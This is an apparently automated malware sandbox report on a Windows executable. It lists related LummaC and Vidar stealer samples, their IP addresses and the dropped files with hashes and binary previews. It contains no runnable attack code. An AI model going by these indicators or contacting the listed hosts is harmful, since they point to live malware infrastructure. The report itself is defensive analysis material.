                                                                                                                                                    Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    RELCOM-ASRelcomGroup19022019RUj2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 194.87.58.92
                                                                                                                                                    es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 194.87.58.92
                                                                                                                                                    vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 194.87.58.92
                                                                                                                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 194.87.58.92
                                                                                                                                                    arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.58.66.244
                                                                                                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.58.66.131
                                                                                                                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.58.66.244
                                                                                                                                                    hmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.58.66.131
                                                                                                                                                    harm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.58.66.244
                                                                                                                                                    harm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.58.66.131
                                                                                                                                                    CLOUDFLARENETUSTdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.157.254
                                                                                                                                                    3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.66.86
                                                                                                                                                    726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.157.254
                                                                                                                                                    Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.157.254
                                                                                                                                                    YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.157.254
                                                                                                                                                    v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.66.86
                                                                                                                                                    H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.66.86
                                                                                                                                                    8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                    • 104.21.66.86
                                                                                                                                                    FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.157.254
                                                                                                                                                    FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 172.64.41.3
                                                                                                                                                    AMAZON-AESUSZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.2.51
                                                                                                                                                    3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.2.51
                                                                                                                                                    726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.2.51
                                                                                                                                                    Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.2.51
                                                                                                                                                    YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.2.51
                                                                                                                                                    2S6U7zz1Jg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.2.51
                                                                                                                                                    v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.2.51
                                                                                                                                                    H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.2.51
                                                                                                                                                    8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                    • 104.21.2.51
                                                                                                                                                    FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.2.51
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\768400\Climb.comj2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                              installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                    ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):947288
                                                                                                                                                                        Entropy (8bit):6.630612696399572
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                        MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                        SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                        SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                        SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: j2nLC29vCy.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: es5qBEFupj.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: vUcZzNWkKc.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: CLaYpUL3zw.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: BagsThroat.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: SoftWare(1).exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: ZTM2pfyhu3.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: JA7cOAGHym.exe, Detection: malicious, Browse
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):459790
                                                                                                                                                                        Entropy (8bit):7.999632331590964
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:12288:P02pW2c56oA+/4hza+MglCQS9z/jgM/UB:w2LNMW6/gM/UB
                                                                                                                                                                        MD5:F9D71E9E58748BEEA3554073DCD205C8
                                                                                                                                                                        SHA1:0F059E563F46355BCA0866B3D7D0993DA4991C18
                                                                                                                                                                        SHA-256:45206C86B0AE3EB38240DD076201BE60B4983BBD0209CAA20516A9E6595C8BBA
                                                                                                                                                                        SHA-512:BBC015D43F281AF0D1CC75C3E41E13E09E5D24E9F23DB9FF5B6012E5D8978FD9C6C5C4A08B6262909660C606014BB375DCE1C4C909CA4B2D2CCA39722EBAF1A0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1*.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5*cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9*M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......|QT~dB..c..O..$.C..*.l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):104448
                                                                                                                                                                        Entropy (8bit):5.172930596796904
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:sc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVx:/PdKaj6iTcPAsAhxW
                                                                                                                                                                        MD5:BE1780E619FC600C90159E321A7BCBB9
                                                                                                                                                                        SHA1:C710D9B6E5843AD64355C032D4835707B245170E
                                                                                                                                                                        SHA-256:DBA6C4B6BEB02F24A6B4F3C7892605A06A8D99D5F65366C021B1337F1D192852
                                                                                                                                                                        SHA-512:F0BB5EB234DD25FBB7D7107839CBC9E72CBD1E269CA5F4445E245CBAC4CD8E6DD8966BB4DB08C0B0C88AB22E4A78E46CC3323E201E31E15E0E6E9D82C416D0ED
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:................................................................................................................................................................................................b........\... ... |....................................................................L...........I.....................................................................................0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F................?......Y@.....@.@......P?...........................(#...pqrstuvwxyz{$--%"!' .&,[\.....`abcdefghijkmno]......_..................................................................................................................................................1L..2L..2L..2L.$2L.42L.@2L.H2L.T2L.\2L.l2L.t2L.|2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..3L..3L. 3L.,3L.43L.<3L.T3L.`3L.l3L..3L...J..3L..3L..3L..3L..3L..3L..3L..4L..4L.$4L.44L.D4L.T4L.l4L..4L..4L..4L..4L..4L..4L..4L..4L..4L..5L...J..5L.45L.P5L.p5L..5L..5L..5L..5L..6L.$6L.<6L.P6L.h6L..6L..6L..6L..6L
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):268
                                                                                                                                                                        Entropy (8bit):4.968398681802287
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:1qjvVg3F+X32+hZCt7HSbYwClS6CSNEcixNU:1yGSG+fCtJfjEvq
                                                                                                                                                                        MD5:41B7CDB6E286EE0E44962C8987B91D3C
                                                                                                                                                                        SHA1:E57E0B12ABC823CB91D3ACFA32AD63230405057D
                                                                                                                                                                        SHA-256:43F8E40249EC2FC185FDC323451FB72384EC9FF5910BD927C89CE8C41CACB58B
                                                                                                                                                                        SHA-512:B4423FD2C9D40D3715F93C6E130AF4B81CAA0B3BB3D23AF542D7043E6B91CAB1CCDDDBD2ECE8656736E4A3C594BAD99436432F4BD2EA2EA133FF381DCB8248CA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:cocks........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):141312
                                                                                                                                                                        Entropy (8bit):6.686197497967684
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:fEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2uI:sMVIPPL/sZ7HS3zcNPj0nEo3tb2j
                                                                                                                                                                        MD5:2ED9FFBA1FEA63AD6D178AEA296ED891
                                                                                                                                                                        SHA1:E0D1BB0AF918F8DDEE3FB3D593CAF0FC52C77709
                                                                                                                                                                        SHA-256:21B6E909F647CC2B1ADB6945ACEDA0EE2CB3DF2C91641D7609FFAB2DB6A40FA1
                                                                                                                                                                        SHA-512:52524AD966A8D72BB53ECBA0AC5EE5DC0DB6BE0569CC0E7E0C2D03B5266465C5162AD1048AD1B827E3BDCF985D0932E19336C2D5179BCD7E655E87BABB421055
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.U...........tB.E..M.}.G.}..H.E.;}.|..%.......t.;.....v..Fh.............RY...}..}.........E...@..P.u.V.u..u............V.......;E...&....}..t.f.......f#......f;.u.....E...@..P.u.V.u..u..G........t............}......F|.M.+..........C.........M.f9C...........]..e.....C.......%..........E.............U.......8....E...%....=....u".M................%.....M..........E.;.U...C.]........U..........L.............M.,K......K...;.............K......f;.w..F<.....E.............f;.w..F<.....E.;..............E..]..j.....C......E.U.......E.......C.3.U.E..(t..U...5u..E...........~3..E.........U...d......E.........U...N3..E.........U..E........;................+.....U.....+K.....+K..U.E..u..E......}......E..E...y...%.....E......]..E......E.....=....u<..C..].%...........E...........E............E.......]..E....E.}...]..Y.]..........r;.}.........L..............M.,K......K...;.t..U.......U....3..}..E...............E....M.F|.}.+.;.w.Q.u.W.6n.......u..M.....E..?.E......<.....
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):62464
                                                                                                                                                                        Entropy (8bit):7.997732291588885
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:OC2t1VFGBsTxn/fkC+a+kem/B7BKtrFhBzd6g/4k:OC2j+u/CXoJ7ctrfxn/h
                                                                                                                                                                        MD5:50CB864F887F934B80CC62A6BB08D611
                                                                                                                                                                        SHA1:C23F38262D04019CF198D4499DD95945FE078EC4
                                                                                                                                                                        SHA-256:B2F79588B9EC05A7520F42382EA47F596AEB82A83AA4BF3426DB5AA64ABF877A
                                                                                                                                                                        SHA-512:9F68238A297F61C48380CE6867AFB929A231AB88CA836E00400B182F3CF5EED99E69B38A60CBFA578FFBF50D5C3326A6E8ECEFDF719FA8FBB99F1FC4C799E283
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.3.|...zit..ct.]!....).1o......>4...?c._...3...bd..t.[(FiSi._...2.%...".....!P...c.Y ..k...\O.k..i..}...r&..r.*........Y.hTy4...n."....4..=T......A.{...b*<_.4./..+g.(.g.WK..)s..........js..y.i.Y.q8.\..<.6.........S......!..hP..<.f.||.Y..d:8...i.i.T.'5..g.U..B..%..O....fg.v.8.Cp.W....(..3...J?. P$O...:u.Q....K.m.....N.b.A.e.M.7...{. C6U..(<_6y.QV....?..4...^.~.....A4.....U<..^....Y..n}.Y..h.).....Y#u...Y>.u.O.v....:..#..0......$KN.j.gK.(.x4......50.X....*m......\Od.K.}CN....n/."w(.Ru.6...6..\y}.{..w./..U...,&......`<..<....X:@$Ea.....4.....P..>........F..t<.M1C....`..F7EE.....A.m.W.......19.".?H...Q.....0.!K.).W..U.J=h}J... .n..L&5D....'F- s.e...v...@...'.Iwv.IcHPH..w..?..9.5#..C..I0.a.,.D.b.|....~........|9..........3....l_........B`G.UH..I.E......z&..t.M........E.,.&.[..Y..l.G...Ll..W>.3.i..B...S..8V.:\W.............$.c+@-..N/hd.YH.M..8L...WC..IX...?...?!k.F.b.....CLN..C.\..........J....i.....o...o..e.Y.....K..UL.]....K.v...y..e..:..X#.m.
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):59392
                                                                                                                                                                        Entropy (8bit):6.612657669946948
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:FC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmES6:AhVOoQ7t8T6pUkBJR8CThpmES6
                                                                                                                                                                        MD5:A5CA22529355B052CBCCB045EC8172A1
                                                                                                                                                                        SHA1:12F5D5871B07A1EABB9B57753432FC59680830D2
                                                                                                                                                                        SHA-256:E434C2A8351E6517F35FFA6D38542390AD0A905BC23FAC64E7D61680AE7CEB67
                                                                                                                                                                        SHA-512:AF9D158F1590FB96C1FB7DD1635FE9D1D7528FC3349068363F169907411EE488E2BF6AC03CE851189DBF24FDED3504A574FFF51B5CE6D41E06D8AB9360FC099E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.E........E.Pj.V.u..E.........I...tV.E.....uM.U..$.........@..@.......t.........$........................t........3.@...3..3..Y3._^[....U...4.M..V.u...u..M...)M...3.@....W...t....tz...t....t..E...)M.PV.i.....t].}........t+M...tK.x..tEj,.E..E.0...j.P.X......E......E.P...t+M.j.V.0....I...t..M..E...3.@..3._^....U..U..E......y..........t...=....}.........t.....2.]...U......L.M.SVW.[s..P.L$$.s...L$..3.u..|$ .....................t&...t!.D$...)M.PV.p............]..t$..T.......t....u/f9..<*M.u.h.)M........f9..,*M.u.h.)M...W.W...3.9..t+M...z...f9...q......t+M.h.....D$...2..YP.L$...r..3..D$(0...j,P.D$4P.AW...D$$....D$L.D$(.D$,.....D$P....P3.P.D$.V.0....I..........D$0...........D$4%.....D$...y&3.f9.......W...D$0.....|$P..|..Y.D$P.L.D$4..@t......y.......t........t..........t.......D$4.t...u.....D$,.....D$4.D$(P3.P.D$.V.0....I...t3..~*......t.3.PV...|$..t.3.Pj..D$..0....I...t.3.C..3...D$..(.u.j.P.0...t$ ..0.......3..L$$.).u.j.Q.0..W..0....._^..[..]...U..Q.M...E.P.u...)M..Z.....t,.E
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):83982
                                                                                                                                                                        Entropy (8bit):7.99794941439563
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:SL5dqhmZ4lVzAf9EFl407V6Lf4wXM3wmosIAUZ8DYZyxSr1Pum:WqU2zOmFl40RwfdM3Ros/URcxgmm
                                                                                                                                                                        MD5:B0830E2CE03D5BC821D5136F5D8B4D5E
                                                                                                                                                                        SHA1:99840A43C60501C4F1F0151EE11798C7FA395591
                                                                                                                                                                        SHA-256:D5916524E70C85211005E2E7851E8250BF46ADD8C28FD501DB4BCFBE9EE1ADEE
                                                                                                                                                                        SHA-512:58F230B27771DA357658231E2E7445E7D13239CDB0D10D4CD5FA81267DF6EA4883C23139CE41F4892E64B6EE3CD67176C52375E9710823133B7CE20D0EB62934
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:...U.,..l..I.E.l./@..8......%...i.\w6TJ....Vr...s.Y7"u......T......Z.f..Cv.X...th.....N..Ao.."C..K...(....1;WL...7..59...z..C-+..OD.N.7@.}.]......z;......^.w.2ee(.4.....FS....;B...0.#......f.r8...Y...ao.)../..0......;..ANl...f..m.=[].K.FQ4n...,........5?......E,..o../.}B..<.........te.._..s..}......._-...&.nOj..........[..p.[....CD..',...r.})e..!...K.?*.x.SK.fs.{.u..E3V..8.."...^L.)J....:.................[1.........|.p......Ou.n....+...P...}.&C..!..,.V.P...#..v.P..P..6.....F....I..8...Q...gP)V@..U.......S.wG..k'5>..i`*...KH...\ ..y....................ql...x.....&....o..=...V.H.=W.....LO..#...._H..t.....0..;.&Ie...?.z...@....s......2$r.Am..).A..J...U.5,.(M..._...]h..0...{....1..G....R...L.u....M.....:.q..%.!O....q.|.:....xy....w"N.c..y.t....Y.).-...T#...2=.nB.dM.M...+.p.....M....1_..M...k..Wp.e......M.J.5w].........R.P......(....Z.}b.K...|...vZ.V.p..........D9........t...k.....ge.m.rVj..;..m;D..P.rR..`'5..9.LXY........d.RJ+..)
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):119633
                                                                                                                                                                        Entropy (8bit):6.0874087589267925
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:sgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:sgarB/5elDWy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                        MD5:7D6337C50FA5EB0681D5B094E58E3541
                                                                                                                                                                        SHA1:BD1A7A54D4F4382AACA1FFAF4A690799CA6081F7
                                                                                                                                                                        SHA-256:791C72AEB0CAF7FC14F0420F053C0698D27D68265810762470307EA489568780
                                                                                                                                                                        SHA-512:A24F3EADC814C87F2D592F64467CC0894347ADE35924507E81719104C0B9F293A76A51D92B5329CB57574B6EE65C71ED1BBE30D61BE041E1AE522ADDE617912F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.KillTimer.7.PostQuitMessage...SetFocus....MoveWindow....DefWindowProcW....MessageBoxW...GetUserObjectSecurity.-.OpenWindowStationW..h.GetProcessWindowStation...SetProcessWindowStation.(.OpenDesktopW..N.CloseWindowStation..J.CloseDesktop....SetUserObjectSecurity...GetWindowRect.6.PostMessageW....MapVirtualKeyW..&.GetDlgCtrlID..d.GetParent...GetClassNameW.;.CharUpperBuffW....EnumChildWindows..{.SendMessageTimeoutW.m.ScreenToClient....GetWindowTextW..,.GetFocus....AttachThreadInput...GetWindowThreadProcessId..!.GetDC.e.ReleaseDC...GetWindowLongW....InvalidateRect....EnableWindow....IsWindowVisible...IsWindowEnabled...IsWindow..#.GetDesktopWindow....EnumWindows...DestroyWindow.K.GetMenu...GetClientRect...BeginPaint....EndPaint..U.CopyRect....SetWindowTextW..'.GetDlgItem..s.SendDlgItemMessageW...EndDialog...MessageBeep...DialogBoxParamW...LoadStringW.!.VkKeyScanW..=.GetKeyState.B.GetKeyboardState....SetKeyboardState....GetAsyncKeyState..v.SendInput.0.keybd_event...SystemParametersInfoW...F
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):59392
                                                                                                                                                                        Entropy (8bit):7.997035686695416
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:F5ORWtjA85b/PQW6wzxYtMbs8VKKXsgN1yFi3eb7:Op85T6tIDVKKXZMoeb7
                                                                                                                                                                        MD5:BF1A63801FCE643D91670984E50AA26C
                                                                                                                                                                        SHA1:96CC6E514ED73B0F0816884E6019F3F3C31F6A80
                                                                                                                                                                        SHA-256:96E885D5F09D9B01BBBB20C5DA4005E84683F65EE061EB2D22F41DA96A1A48A0
                                                                                                                                                                        SHA-512:D741447E64E376442A4FBEE480A94C494219292BB70DF6A346C5244C12F647BDC074F13F53A0FC32202C1D8D6A37C7BAA9CC0E750020492B99781D9CEEE3F943
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1*.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5*cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9*M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......|QT~dB..c..O..$.C..*.l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...
                                                                                                                                                                        Process:C:\Users\user\Desktop\TNyOrM6mIM.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1062983
                                                                                                                                                                        Entropy (8bit):7.969270980145046
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12288:00giFMExCeGp6bA+2lC/S9zD0upW2+IHxb7A8G5jMVTn1Xx1MwT6/OkwyR4UzU+J:/ieH66juI80CT1DMa4LwxIM9HM/U1OK
                                                                                                                                                                        MD5:A3E9A86D6EDE94C3C71D1F7EEA537766
                                                                                                                                                                        SHA1:DDFBF23CBA3ADC0BCAD33162D1BDBEE8CCD12294
                                                                                                                                                                        SHA-256:A7B3B6CA09E92530EF0BD156B0C2C0213E957129BFB83B8A99D2387932BB2CA5
                                                                                                                                                                        SHA-512:AF6391847FF626FF88FF0583ADDE9536EFF25026ACBC0D0165CE27286A8F145CBB0B5059A294D7A14CB497C60B96E9A5DE88D41A3EE6A339FDB554DE51790F0C
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.................................t.....@.................................@..........."u..............8+...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc..."u.......v..................@..@.reloc............... ..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):133120
                                                                                                                                                                        Entropy (8bit):6.593902201612224
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:2+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9cob:2mVnjphfhnvO5bLezWWt/Dd314V14Zgz
                                                                                                                                                                        MD5:998B4B6FEEE76BEB9CA721DCD2B8A4E0
                                                                                                                                                                        SHA1:6556CA455B7F7B3B36F5A703746B17D2D662F82B
                                                                                                                                                                        SHA-256:A3718216E2D86886D768FDE1FE869B9F84FA96309ADC8D83CAF1F17B939F76BF
                                                                                                                                                                        SHA-512:A8E92A0CF4CA465313BFE27D860F956F3777B3202A8B1FDFB03DB4AAAD567F3546C525F40D85414D04806D964B650637846FD1F7CCA6736B8C8E327B342C3617
                                                                                                                                                                        Malicious:false
